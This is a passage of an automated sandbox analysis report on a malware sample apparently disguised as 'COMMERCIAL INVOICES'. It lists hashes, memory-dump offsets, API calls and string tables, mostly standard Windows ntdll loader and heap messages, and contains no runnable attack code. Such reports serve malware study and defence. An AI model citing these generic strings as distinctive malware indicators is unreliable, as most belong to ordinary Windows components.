• Instruction ID: 86e8de0b69b220123afd75d85ef0778f63e15e3d15d1f3158ea552780d0add05
• Opcode Fuzzy Hash: 7fca55cfca3f4642834bdcb50ebb40f9ae7e426c7c5bf9cbfb610512ed6e1b90
• Instruction Fuzzy Hash: 7231CB76948605EFCB11CF74D880BDA7B78EF04324F5406ABE504EF692E3359A89CB81

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 63 42c653-42c697 call 404563 call 42d543 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C692
Strings
Memory Dump Source
• Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: gaA
• API String ID: 3298025750-3487838039
• Opcode ID: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
• Instruction ID: 0f54cc4c58eed4b11caafc6c3fb3cc4faf5abc868a4e4e94059387e8b55b0c93
• Opcode Fuzzy Hash: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
• Instruction Fuzzy Hash: 8BE092B1604315BBDA14EE59EC41FDB33ACDFC9714F004019FA08A7241C770B91087B5

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 224 42c603-42c644 call 404563 call 42d543 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041E1EE,?,?,00000000,?,0041E1EE,?,?,?), ref: 0042C63F
Memory Dump Source
• Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
• Instruction ID: 5e4f2097ad85ed4dd12722a4a0779c478e64be7103f06555aeb9d7b0c16acb50
• Opcode Fuzzy Hash: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
• Instruction Fuzzy Hash: 56E06D72644314BBDA10EE59EC41F9B33ACEFC4710F004419FA08A7241C671B910C7B8

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 234 42c6a3-42c6df call 404563 call 42d543 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,AAF2BD6B,?,?,AAF2BD6B), ref: 0042C6DA
Memory Dump Source
• Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 90b41b10de4001358981773a3cc5b704e093dac5ec8a691516e76633fc460d72
• Instruction ID: 8e64d3ae1f2fcbff29acd26afc7f6174e128b6ccc4e61b38a69ba5a18093cff1
• Opcode Fuzzy Hash: 90b41b10de4001358981773a3cc5b704e093dac5ec8a691516e76633fc460d72
• Instruction Fuzzy Hash: 23E046366402147BDA20FA6AEC41F9BB76CDBC5754F40402AFA08A7242C6B0BA0187B5

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 239 1282c0a-1282c0f 240 1282c1f-1282c26 LdrInitializeThunk 239->240 241 1282c11-1282c18 239->241
APIs
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 35c6ac851d93258acd4eede8dcbbc904ba5a43902bec412699211a5a1c2aed42
• Instruction ID: b54715120fad3f7bd69ae5b5c0ac782ef60fdd684ce88cbc80fb9aa0ec1b2049
• Opcode Fuzzy Hash: 35c6ac851d93258acd4eede8dcbbc904ba5a43902bec412699211a5a1c2aed42
• Instruction Fuzzy Hash: 0AB09B719125D5C5DF11F7644608717790077D1701F1AC061D3034645F473CC1D1E375
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: b27794648d686c3ba5d015869feed2b93529bddccf51f29b5b1f505ca8f1ae53
• Instruction ID: 78a36889d925ae1c506063ff53833a7440ceb4d0b11ca5a00ee1cfe6791facea
• Opcode Fuzzy Hash: b27794648d686c3ba5d015869feed2b93529bddccf51f29b5b1f505ca8f1ae53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85927D71624342EFE725DE28C881B6BB7E8BB84B54F144A1DFB94D7250DB70E844CB92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 012B5543
                                                                                                                                                                                                                                      • corrupted critical section, xrefs: 012B54C2
                                                                                                                                                                                                                                      • Critical section address, xrefs: 012B5425, 012B54BC, 012B5534
                                                                                                                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B54E2
                                                                                                                                                                                                                                      • Critical section address., xrefs: 012B5502
                                                                                                                                                                                                                                      • Critical section debug info address, xrefs: 012B541F, 012B552E
                                                                                                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B54CE
                                                                                                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 012B5508
                                                                                                                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B540A, 012B5496, 012B5519
                                                                                                                                                                                                                                      • Thread identifier, xrefs: 012B553A
                                                                                                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 012B54B6
                                                                                                                                                                                                                                      • 8, xrefs: 012B52E3
                                                                                                                                                                                                                                      • Address of the debug info found in the active list., xrefs: 012B54AE, 012B54FA
                                                                                                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 012B542B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                                                                                                                      • Opcode ID: 8b2cb95860d05f55a7d258d8b8ca9828946b996e33ae056f583bb7c2cd787e8c
                                                                                                                                                                                                                                      • Instruction ID: d156cc1217ed0ebd7cac6f2723e57b84a505e4d0b80becab53a09532fab60a4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b2cb95860d05f55a7d258d8b8ca9828946b996e33ae056f583bb7c2cd787e8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9818CB0A61359BFEB20CF99D885BAEBBF5FB48714F144119F604BB290D3B5A940CB50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 012B261F
                                                                                                                                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012B22E4
                                                                                                                                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012B2624
                                                                                                                                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012B2409
                                                                                                                                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012B25EB
                                                                                                                                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012B2498
                                                                                                                                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012B24C0
                                                                                                                                                                                                                                      • @, xrefs: 012B259B
                                                                                                                                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012B2506
                                                                                                                                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012B2412
                                                                                                                                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012B2602
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                      • API String ID: 0-4009184096
                                                                                                                                                                                                                                      • Opcode ID: 5b73691344b8253e707e436641b60968a51cee305f3466e8ace0cb61a273134d
                                                                                                                                                                                                                                      • Instruction ID: 8b0b172522b8a2c835fe7e8e07cb7c007449baa5281fac7654f1e5dacf633432
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b73691344b8253e707e436641b60968a51cee305f3466e8ace0cb61a273134d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE0280B1D20229DFDB21DB54CC81BEAB7B8AB54304F0141DAE749A7241EB70AF84CF59
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                                                                                                                      • Opcode ID: b3180720dfd4c9abc2ef9bac020351bcde6b5c0f8737b4306fe798e3a414fa34
                                                                                                                                                                                                                                      • Instruction ID: be7f0889df939b4bfca32997d84d04e44f8c80919dad68a56f7b9cd96d15e889
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3180720dfd4c9abc2ef9bac020351bcde6b5c0f8737b4306fe798e3a414fa34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E951C1715353429BC329DF288848BABBBECEFD9750F54491DEA95C3244E770D504C7A2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                      • API String ID: 0-1700792311
                                                                                                                                                                                                                                      • Opcode ID: 2d5b4e629775609b7ef554d4683ba2f80a0be35d63a509cbe0bfefcbfd1d2191
                                                                                                                                                                                                                                      • Instruction ID: c21b6645d477eeba0358830840948b2689e9d5a410674a897a4e6ed76a4af188
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5b4e629775609b7ef554d4683ba2f80a0be35d63a509cbe0bfefcbfd1d2191
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D1DD71620686DFDB22DF68C441AAAFBF2FF9A700F08806DF6459B652C774D941CB18
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 012C8A67
                                                                                                                                                                                                                                      • VerifierDebug, xrefs: 012C8CA5
                                                                                                                                                                                                                                      • HandleTraces, xrefs: 012C8C8F
                                                                                                                                                                                                                                      • VerifierDlls, xrefs: 012C8CBD
                                                                                                                                                                                                                                      • VerifierFlags, xrefs: 012C8C50
                                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 012C8A3D
                                                                                                                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 012C8B8F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                                                                                                                      • Opcode ID: ab81798979b9329955ea3120ad4ac5b1b62afbdf24ffa9c5bf04a2c606992b53
                                                                                                                                                                                                                                      • Instruction ID: 57ab6aa259b20181c9e2605be609d897f36707d9b65226a0c80ede83bba73770
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab81798979b9329955ea3120ad4ac5b1b62afbdf24ffa9c5bf04a2c606992b53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 189146B2661716AFD721EF68D881B2A77E8EF94F14F05861CFB40AB240D7709D01CB99
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                      • API String ID: 0-1109411897
                                                                                                                                                                                                                                      • Opcode ID: ec57c8114f23b85e1d8f7b78f80724bb5ec65e15a12ad322609381750fcbcb16
                                                                                                                                                                                                                                      • Instruction ID: 2af2add499433c74e1a036d9de5ebf8c300486f61af67cb6a44b19fc02d16c16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec57c8114f23b85e1d8f7b78f80724bb5ec65e15a12ad322609381750fcbcb16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9A24C70A2566A8FEB68DF18CD887A9BBB5FF85304F5442D9D90DA7250DB749E80CF00
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                                                                                                                      • Opcode ID: 7d43e21f22231e7e4bb0c98c68a6488b5f02f6d1373b4208166355ff2833937e
                                                                                                                                                                                                                                      • Instruction ID: ac2f51acccdd3c9d2ad75b74f4c90ddafdb0d59ce8baa69af7e313c7e07adace
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d43e21f22231e7e4bb0c98c68a6488b5f02f6d1373b4208166355ff2833937e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE914970B30752EBEB39EF18E8D5BFA3BA5FB50B54F044128E6016B282D7B49801C795
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01299A2A
                                                                                                                                                                                                                                      • LdrpInitShimEngine, xrefs: 012999F4, 01299A07, 01299A30
                                                                                                                                                                                                                                      • apphelp.dll, xrefs: 01236496
                                                                                                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012999ED
                                                                                                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01299A01
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01299A11, 01299A3A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-204845295
                                                                                                                                                                                                                                      • Opcode ID: 32645fb042ff241603e246d36018dfa3f5c22d2a83cbe4c70033e62a75a8df0a
                                                                                                                                                                                                                                      • Instruction ID: d8da42dd5afe5626c448bb05d1f3bda539c3e9aa6c33e9ce570629d3000440d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32645fb042ff241603e246d36018dfa3f5c22d2a83cbe4c70033e62a75a8df0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA51E371238301AFEB21DF28D881BAB77E8FB84758F00491DF585971A0D774EA44CB96
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012B2180
                                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 012B2165
                                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012B21BF
                                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012B2178
                                                                                                                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 012B2160, 012B219A, 012B21BA
                                                                                                                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012B219F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                                                                                                                      • Opcode ID: 0f8d0e597b952c4f76bfceb22bf7cc6860ce61e10306e9d6ea70877d20aae41f
                                                                                                                                                                                                                                      • Instruction ID: cb229342284538e9ef8f109306ab9867fb8912a408ed6d707b26a3bba7b90a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f8d0e597b952c4f76bfceb22bf7cc6860ce61e10306e9d6ea70877d20aae41f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD31EB36B70325F7E7218A998D86FAFBA79DB65B90F05005DFB0467141D2B0AA01C7A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 012B8181, 012B81F5
                                                                                                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 012B81E5
                                                                                                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 012B8170
                                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 0127C6C4
                                                                                                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 012B8177, 012B81EB
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0127C6C3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                                                                                                      • Opcode ID: ceeaf44f6a29fbe7dd92a362bf488d40aaada27de55e0c6f6f1516c2827eccba
                                                                                                                                                                                                                                      • Instruction ID: df6d62711a9fdf39ace85e359ec7dada180306c167a916fa9485df2b051ca037
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceeaf44f6a29fbe7dd92a362bf488d40aaada27de55e0c6f6f1516c2827eccba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3310371664343AFC224EF29DD86E6B77D8EFD4B50F04051CF984AB291E620EC04CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 01282DF0: LdrInitializeThunk.NTDLL ref: 01282DFA
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280BA3
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280BB6
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280D60
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280D74
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1404860816-0
                                                                                                                                                                                                                                      • Opcode ID: e37cc4b43b18ab4a78622b32e339b43dc5017d1b10ecbe987fe8cb808940c968
                                                                                                                                                                                                                                      • Instruction ID: 510463fd952187050920006416c4a19844309a24d22f5784d23817b9393c0f20
• Opcode Fuzzy Hash: e37cc4b43b18ab4a78622b32e339b43dc5017d1b10ecbe987fe8cb808940c968
• Instruction Fuzzy Hash: A6426E71911716DFDB61DF28C881BAAB7F4FF04314F1445A9EA89EB281E770A984CF60
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
• Opcode ID: 11f0408c581a1536fd781ce0e9f0c82de289065b0686a69cd2e68c8549ae3ee2
• Instruction ID: 6f2d18c4c8b29636fa55b70983356db5b2dc582918199c10b2d2181fcb95ab25
• Opcode Fuzzy Hash: 11f0408c581a1536fd781ce0e9f0c82de289065b0686a69cd2e68c8549ae3ee2
• Instruction Fuzzy Hash: ABC1BC74568382CFD729CF58C140B6AB7E4FF84704F04496AFA968B291E774C949CBA2
Strings
• @, xrefs: 01278591
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0127855E
• LdrpInitializeProcess, xrefs: 01278422
• minkernel\ntdll\ldrinit.c, xrefs: 01278421
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
• Opcode ID: 494392e066ffc0763318a5b2a5d014b4fcff60dde8f7cb405d3ba61aa61a6ea9
• Instruction ID: feb409cfc8b08eac5fd2f4e75b95148002b4c7c753403ec2e9272bd106f33c46
• Opcode Fuzzy Hash: 494392e066ffc0763318a5b2a5d014b4fcff60dde8f7cb405d3ba61aa61a6ea9
• Instruction Fuzzy Hash: 3A91A971569346AFD721EF25C885FABBAECFF84784F40092EFA8496141E370D904CB62
Strings
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012B21D9, 012B22B1
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012B22B6
